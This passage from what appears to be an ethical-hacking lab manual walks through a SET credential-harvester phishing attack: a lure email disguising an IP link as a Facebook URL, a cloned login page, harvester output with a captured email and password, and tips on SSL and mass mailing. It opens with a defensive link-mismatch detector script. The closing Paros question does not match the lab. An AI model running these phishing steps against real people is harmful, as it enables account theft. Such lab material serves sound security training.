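domain while the href goes somewhere else, and hrefs that point at a
bare IP address. Constructed for this page; not part of the lab or SET."""
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample modelled on the lab's email: the anchor text looks
# like a Facebook URL but the href is the harvester's IP (10.0.0.15 is
# the value the lab uses). The second and third anchors are benign.
SAMPLE_EMAIL_HTML = """
<p>Hello Sam,</p>
<p>Please click this link
<a href="http://10.0.0.15/">www.facebook.com/Rini TGIF</a>
to view the weekend party pictures at TGIF with the celebrities.</p>
<p>See also <a href="https://www.example.com/docs">www.example.com/docs</a>
and <a href="https://www.example.com/help">our help page</a>.</p>
"""

# Leading domain name in a piece of link text, with or without a scheme.
_DOMAIN_RE = re.compile(r"^(?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})", re.I)


class _AnchorCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self.anchors = []
        self._href = None   # None while not inside an <a>
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            text = " ".join("".join(self._text).split())  # collapse whitespace
            self.anchors.append((self._href, text))
            self._href = None


def _host_of(url):
    """Lower-cased hostname of a URL; a bare 'www.x.com/path' is accepted."""
    if "://" not in url:
        url = "http://" + url
    return (urlsplit(url).hostname or "").lower()


def _is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def find_suspicious_links(html):
    """Return (reason, href, text) triples for anchors that look deceptive."""
    collector = _AnchorCollector()
    collector.feed(html)
    findings = []
    for href, text in collector.anchors:
        href_host = _host_of(href)
        if _is_ip_literal(href_host):
            findings.append(("href points at a bare IP address", href, text))
        match = _DOMAIN_RE.match(text)
        if match:
            claimed = match.group(1).lower()
            # The text claims a domain: it must be the href host itself or a
            # parent of it (login.example.com under example.com is fine).
            if claimed != href_host and not href_host.endswith("." + claimed):
                findings.append(("link text names a different domain", href, text))
    return findings


if __name__ == "__main__":
    for reason, href, text in find_suspicious_links(SAMPLE_EMAIL_HTML):
        print(f"{reason}: text={text!r} href={href!r}")
```

The same check applies to the hover-text trick described in the web jacking note: what the mail client shows on hover is the href, so comparing it with the visible text is what exposes the mismatch.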
Note: In some cases when you're performing an advanced social-engineer attack you may want to register a domain and buy an SSL cert that makes the attack more believable. You can incorporate SSL based attacks with SET. You will need to turn the WEBATTACK_SSL to ON. If you want to use self-signed certificates you can as well however there will be an "untrusted" warning when a victim goes to your website.

[Screenshot: Gmail Compose Mail window. Clicking the link text www.facebook.com/Rini TGIF in the body shows "Go to link: http://10.0.0.15/ - Change Remove".]

FIGURE 3.15: Actual URL linked to Fake URL
19. When the victim clicks the URL, he or she will be presented with a replica of Facebook.com.

20. The victim will be enticed to enter his or her user name and password into the form fields as it appears to be a genuine website. When the victim enters the Username and Password and clicks Log In, it does not allow logging in; instead, it redirects to the legitimate Facebook login page. Observe the URL in the browser.


Note: The multi-attack vector allows you to turn on and off different vectors and combine the attacks all into one specific webpage. So when the user clicks the link he will be targeted by each of the attack vectors you specify. One thing to note with the attack vector is you can't utilize Tabnabbing, Cred Harvester, or Web Jacking with the Man Left in the Middle attack.

Note: The multi attack vector utilises each combination of attacks and allows the user to choose the method for the attack. Once you select one of the attacks, it will be added to your attack profile to be used to stage the attack vector. When you're finished be sure to select the 'I'm finished' option.

[Screenshot, top: the cloned Facebook Login page served from the BackTrack machine (Email or Phone, Password, Keep me logged in, Log In, Sign up for Facebook, Forgot your password?). Screenshot, bottom: after the redirect, the legitimate page at https://www.facebook.com/login.php in Google Chrome, with the browser bar "Do you want Google Chrome to save your password? Save password / Never for this site".]

FIGURE 3.16: Fake and Legitimate Facebook login page

21. As soon as the victim types in the email address and password, the SET Terminal in BackTrack fetches the typed user name and password, which can be used by an attacker to gain unauthorized access to the victim's account.


Note: Social Engineer Toolkit Mass E-Mailer. There are two options on the mass e-mailer; the first would be to send an email to one individual person. The second option will allow you to import a list and send it to as many people as you want within that list.

[Screenshot: Credential Harvester output in the Terminal]
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
10.0.0.6 - - [26/Sep/2012 11:10:41] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: lsd=AVqgmkGh
PARAM: return_session=0
PARAM: legacy_return=1
PARAM: display=
PARAM: session_key_only=0
PARAM: trynum=1
PARAM: charset_test=[unreadable in scan]
PARAM: timezone=-330
PARAM: lgnrnd=224034_ArYA
PARAM: [unreadable in scan]
POSSIBLE USERNAME FIELD FOUND: [unreadable in scan]
POSSIBLE PASSWORD FIELD FOUND: [unreadable in scan]
PARAM: default_persistent=0
POSSIBLE USERNAME FIELD FOUND: login=Log+In
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.

FIGURE 3.17: SET found Username and Password

22. Press CTRL+C to generate a report for the attack performed.


Note: The multi-attack will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing, and the Man Left in the Middle attack all at once to see which is successful.

[Screenshot: report generation in the Terminal]
PARAM: lsd=AVqgmkGh
PARAM: return_session=0
PARAM: legacy_return=1
PARAM: display=
PARAM: session_key_only=0
PARAM: trynum=1
PARAM: charset_test=[unreadable in scan]
PARAM: timezone=-540
PARAM: lgnrnd=224034_ArYA
PARAM: lgnjs=n
POSSIBLE USERNAME FIELD FOUND: email=[unreadable in scan]
POSSIBLE PASSWORD FIELD FOUND: pass=test[rest unreadable in scan]
PARAM: default_persistent=0
POSSIBLE USERNAME FIELD FOUND: login=Log+In
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
^C
[*] File exported to reports/2012-09-26 15:49:15.5464[unreadable in scan].html for your reading pleasure...
[*] File in XML format exported to reports/2012-09-26 15:49:15.5464[unreadable in scan].xml for your reading pleasure...

Press <return> to continue

FIGURE 3.18: Generating Reports through SET

Lab Analysis
Analyze and document the results related to the lab exercise.


Tool/Utility: Social Engineering Toolkit

Information Collected/Objectives Achieved:
PARAM: lsd=AVqgmkGh
PARAM: return_session=0
PARAM: legacy_return=1
PARAM: display=
PARAM: session_key_only=0
PARAM: trynum=1
PARAM: charset_test=€,',€,',
PARAM: timezone=-540
PARAM: lgnrnd=224034_ArYA
PARAM: lgnjs=n

email=samchoang@yahoo.com
pass=test@123

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions
1. Evaluate each of the following Paros proxy options:

a. Trap Request

b. Trap Response

c. Continue button

d. Drop button

Internet Connection Required

☑ Yes ☐ No

Platform Supported

☑ Classroom ☐ iLabs
